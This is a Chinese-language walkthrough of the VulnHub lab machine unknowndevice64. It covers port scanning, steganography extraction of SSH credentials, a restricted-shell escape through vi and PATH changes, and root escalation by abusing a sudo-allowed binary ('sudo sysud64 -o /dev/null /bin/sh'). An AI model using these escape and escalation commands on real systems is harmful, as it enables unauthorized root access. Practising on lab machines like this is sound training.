device靶机详解

靶机下载地址

复制代码
https://www.vulnhub.com/entry/unknowndevice64-1,293/

靶机配置

主机发现

复制代码
arp-scan -l

端口扫描

复制代码
nmap -sV -A -T4 192.168.229.159
复制代码
nmap -sS -Pn -A -p- -n 192.168.229.159

这段代码使用nmap工具对目标主机进行了端口扫描和服务探测。

-sS:使用SYN扫描方式进行端口扫描,它比默认的TCP扫描方式更快,因为它只发送SYN包而不发送其他数据包。

-Pn:禁用主机发现,即不发送ICMP Echo Request数据包来判断目标主机是否存活。

-A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。

-p-:扫描所有65535个端口。

-n:不进行DNS解析,直接使用IP地址进行扫描。

192.168.229.159:目标主机的IP地址。

这段代码的目的是扫描目标主机开放的所有端口,并获取其操作系统类型、版本、服务等信息。

网页访问

复制代码
http://192.168.229.159:31337/#

F12查看页面源码

发现隐藏目录key_is_h1dd3n.jpg

拼接访问

是个图片,猜测是个ctf隐写

复制代码
http://192.168.229.159:31337/key_is_h1dd3n.jpg

下载图像,使用kali工具**steghid(开源隐写程序)**进行隐写!!!

复制代码
steghide extract -sf key_is_h1dd3n.jpg

需要密码,猜测为h1ddsn,猜测成功

自动生成一个图片,复制到本机,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;

复制代码
https://copy.sh/brainfuck/

账户:ud64

密码:1M!#64@ud

目录扫描

复制代码
dirb "http://192.168.229.159:31337"

GETshell

ssh连接

复制代码
ssh [email protected] -p 1337

提权

连按两下TAB键,查看当前用户权限,及可以使用的命令:

发现vi和 export命令可以使用

export命令用于设置或显示环境变量,在shell中执行程序时,shell会提供一组环境变量,export可新增,修改或删除环境变量

1、在vi编辑器中,输入 :!/bin/bash

在vi命令行下输入!/bin/bash即可顺利进入bash

2、通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:

复制代码
在vi命令行下输入!/bin/bash即可顺利进入bash
通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
export PATH=/bin:$PATH

使用sudo sysud64 -h查看帮助消息,发现可以使用

复制代码
-o file        send trace output to FILE instead of stderr

尝试将root用户的shell导出到该用户下

复制代码
sudo sysud64 -o /dev/null /bin/sh
复制代码
id
whoami

提权成功

相关推荐
CyberSecurity_zhang1 小时前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
Suckerbin8 小时前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全
自由鬼18 小时前
高性能的开源网络入侵检测和防御引擎:Suricata介绍
网络·安全·网络安全·开源·系统安全·入侵检测
ALe要立志成为web糕手1 天前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
CHTXRT1 天前
2025第十六届蓝桥杯大赛(软件赛)网络安全赛 Writeup
c语言·网络·web安全·网络安全·蓝桥杯·wireshark
Thanks_ks1 天前
深入理解网络安全中的加密技术
网络安全·非对称加密·对称加密·密钥管理·加密技术·https 安全·量子计算安全
迷路的小绅士2 天前
防火墙技术深度解析:从包过滤到云原生防火墙的部署与实战
网络安全·云原生·防火墙技术·包过滤防火墙·状态检测防火墙
浩浩测试一下2 天前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
蚁景网络安全2 天前
从字节码开始到ASM的gadgetinspector源码解析
网络安全
浩浩测试一下2 天前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构